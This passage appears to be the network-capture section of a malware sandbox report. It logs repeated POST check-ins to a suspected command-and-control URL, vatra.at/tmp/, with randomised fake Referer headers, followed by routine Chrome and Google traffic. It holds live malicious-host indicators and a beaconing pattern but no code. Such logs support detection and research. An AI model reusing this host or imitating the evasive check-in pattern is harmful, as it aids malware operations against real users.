                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Content-Disposition: attachment; filename=7FA833348663535EA47A3807B2D8276F
                                                                                                                                                                      Connection: Close
                                                                                                                                                                      Content-Length: 3654016
                                                                                                                                                                      Connection: close
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      190.147.188.50:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST /tmp/ HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://itycxb.com/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 314
                                                                                                                                                                      Host: vatra.at
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.0 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:16 GMT
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      190.147.188.50:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST /tmp/ HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://ckpgq.org/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 150
                                                                                                                                                                      Host: vatra.at
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.0 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:17 GMT
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      190.147.188.50:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST /tmp/ HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://boebdia.com/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 234
                                                                                                                                                                      Host: vatra.at
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:18 GMT
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      190.147.188.50:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST /tmp/ HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://hnyuul.com/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 158
                                                                                                                                                                      Host: vatra.at
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.0 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:19 GMT
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      190.147.188.50:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST /tmp/ HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://noiqqfyy.org/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 252
                                                                                                                                                                      Host: vatra.at
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.0 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:20 GMT
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      190.147.188.50:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST /tmp/ HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://nokye.com/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 344
                                                                                                                                                                      Host: vatra.at
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.0 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:21 GMT
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      190.147.188.50:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST /tmp/ HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://uspgdp.net/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 226
                                                                                                                                                                      Host: vatra.at
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.0 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:22 GMT
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      190.147.188.50:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST /tmp/ HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://asvappce.net/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 237
                                                                                                                                                                      Host: vatra.at
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.0 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:23 GMT
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      clients2.google.com
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      clients2.google.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      clients2.google.com
                                                                                                                                                                      IN CNAME
                                                                                                                                                                      clients.l.google.com
                                                                                                                                                                      clients.l.google.com
                                                                                                                                                                      IN A
                                                                                                                                                                      172.217.168.238
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      accounts.google.com
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      accounts.google.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      accounts.google.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.251.36.45
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      142.251.36.45:443
                                                                                                                                                                      Request
                                                                                                                                                                      POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/2.0
                                                                                                                                                                      host: accounts.google.com
                                                                                                                                                                      content-length: 1
                                                                                                                                                                      origin: https://www.google.com
                                                                                                                                                                      content-type: application/x-www-form-urlencoded
                                                                                                                                                                      sec-fetch-site: none
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=89.0.4389.114&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D150%2526e%253D1
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      172.217.168.238:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=89.0.4389.114&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D150%2526e%253D1 HTTP/2.0
                                                                                                                                                                      host: clients2.google.com
                                                                                                                                                                      x-goog-update-interactivity: fg
                                                                                                                                                                      x-goog-update-appid: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfm
                                                                                                                                                                      x-goog-update-updater: chromecrx-89.0.4389.114
                                                                                                                                                                      sec-fetch-site: none
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      edgedl.me.gvt1.com
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      edgedl.me.gvt1.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      edgedl.me.gvt1.com
                                                                                                                                                                      IN A
                                                                                                                                                                      34.104.35.123
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUwyMERESEZGVmJnQQ/1.0.0.6_nmmhkkegccagdldgiimedpiccmgmieda.crx
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.104.35.123:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUwyMERESEZGVmJnQQ/1.0.0.6_nmmhkkegccagdldgiimedpiccmgmieda.crx HTTP/1.1
                                                                                                                                                                      Host: edgedl.me.gvt1.com
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      content-disposition: attachment
                                                                                                                                                                      content-length: 248531
                                                                                                                                                                      content-security-policy: default-src 'none'
                                                                                                                                                                      server: Google-Edge-Cache
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-xss-protection: 0
                                                                                                                                                                      x-request-id: edd79e58-4ede-489a-b3fd-bf299e4d5ec6
                                                                                                                                                                      date: Sun, 08 Jan 2023 18:08:41 GMT
                                                                                                                                                                      age: 67208
                                                                                                                                                                      last-modified: Fri, 25 Feb 2022 22:08:36 GMT
                                                                                                                                                                      etag: "c994e6"
                                                                                                                                                                      content-type: application/x-chrome-extension
                                                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                      cache-control: public,max-age=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      apis.google.com
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      apis.google.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      apis.google.com
                                                                                                                                                                      IN CNAME
                                                                                                                                                                      plus.l.google.com
                                                                                                                                                                      plus.l.google.com
                                                                                                                                                                      IN A
                                                                                                                                                                      216.58.208.110
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.WEPncdil2Uw.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo-eOecLLtOXEl3I3kIuMsKXRkDMmA/cb=gapi.loaded_0
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      216.58.208.110:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /_/scs/abc-static/_/js/k=gapi.gapi.en.WEPncdil2Uw.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo-eOecLLtOXEl3I3kIuMsKXRkDMmA/cb=gapi.loaded_0 HTTP/2.0
                                                                                                                                                                      host: apis.google.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      dns.google
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      dns.google
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      dns.google
                                                                                                                                                                      IN A
                                                                                                                                                                      8.8.4.4
                                                                                                                                                                      dns.google
                                                                                                                                                                      IN A
                                                                                                                                                                      8.8.8.8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://dns.google/dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.4.4:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/2.0
                                                                                                                                                                      host: dns.google
                                                                                                                                                                      accept: application/dns-message
                                                                                                                                                                      accept-language: *
                                                                                                                                                                      user-agent: Chrome
                                                                                                                                                                      accept-encoding: identity
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://dns.google/dns-query?dns=AAABAAABAAAAAAABBnVwZGF0ZQpnb29nbGVhcGlzA2NvbQAAAQABAAApEAAAAAAAAE4ADABKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.4.4:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /dns-query?dns=AAABAAABAAAAAAABBnVwZGF0ZQpnb29nbGVhcGlzA2NvbQAAAQABAAApEAAAAAAAAE4ADABKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/2.0
                                                                                                                                                                      host: dns.google
                                                                                                                                                                      accept: application/dns-message
                                                                                                                                                                      accept-language: *
                                                                                                                                                                      user-agent: Chrome
                                                                                                                                                                      accept-encoding: identity
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://ssl.gstatic.com/safebrowsing/csd/client_model_v5_variation_6.pb
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      216.58.208.99:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /safebrowsing/csd/client_model_v5_variation_6.pb HTTP/2.0
                                                                                                                                                                      host: ssl.gstatic.com
                                                                                                                                                                      sec-fetch-site: none
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      OPTIONS
                                                                                                                                                                      https://play.google.com/log?format=json&hasfast=true&authuser=0
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      142.251.36.14:443
                                                                                                                                                                      Request
                                                                                                                                                                      OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/2.0
                                                                                                                                                                      host: play.google.com
                                                                                                                                                                      accept: */*
                                                                                                                                                                      access-control-request-method: POST
                                                                                                                                                                      access-control-request-headers: x-goog-authuser
                                                                                                                                                                      origin: https://www.google.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-site: same-site
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.google.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSg034PouhJbw4b_J6gQWj_S8YAFNIc2UP1sXKGxP7Q6ea_HdD605Uu&s=0
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      142.251.36.14:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /images?q=tbn:ANd9GcSg034PouhJbw4b_J6gQWj_S8YAFNIc2UP1sXKGxP7Q6ea_HdD605Uu&s=0 HTTP/2.0
                                                                                                                                                                      host: encrypted-tbn0.gstatic.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      x-client-data: CIr6ygE=
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.google.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcR7WyhGISk_tuHEjDzrkFE-f6s_IE1sUpJwRRQF&s=0
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      142.251.36.14:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /images?q=tbn:ANd9GcR7WyhGISk_tuHEjDzrkFE-f6s_IE1sUpJwRRQF&s=0 HTTP/2.0
                                                                                                                                                                      host: encrypted-tbn0.gstatic.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      x-client-data: CIr6ygE=
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.google.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcT9BCGbNnts-c5TmQ14zUPB1mChSJdHLbIfedI4RDBBhbYCaaxT7Fwh&s=0
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      142.251.36.14:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /images?q=tbn:ANd9GcT9BCGbNnts-c5TmQ14zUPB1mChSJdHLbIfedI4RDBBhbYCaaxT7Fwh&s=0 HTTP/2.0
                                                                                                                                                                      host: encrypted-tbn0.gstatic.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      x-client-data: CIr6ygE=
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.google.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTdx0GZpOzAhKiCNvN8qH0EmjCgz1zgwwFhTtv8fc6MxIB2Adc1xJPF&s=0
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      142.251.36.14:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /images?q=tbn:ANd9GcTdx0GZpOzAhKiCNvN8qH0EmjCgz1zgwwFhTtv8fc6MxIB2Adc1xJPF&s=0 HTTP/2.0
                                                                                                                                                                      host: encrypted-tbn0.gstatic.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      x-client-data: CIr6ygE=
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.google.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQ7E5hkTFjYbyZa4TkMj95_LcI7jkYiOtOgiEnOL7z0jO4Qu4dObhl3&s=0
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      142.251.36.14:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /images?q=tbn:ANd9GcQ7E5hkTFjYbyZa4TkMj95_LcI7jkYiOtOgiEnOL7z0jO4Qu4dObhl3&s=0 HTTP/2.0
                                                                                                                                                                      host: encrypted-tbn0.gstatic.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      x-client-data: CIr6ygE=
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.google.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQob5OIozebeIXq0sgc4ybFnGMw2CY4K46d6m7HycnfLnADxXwwnEM&s=0
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      142.251.36.14:443
                                                                                                                                                                      Request
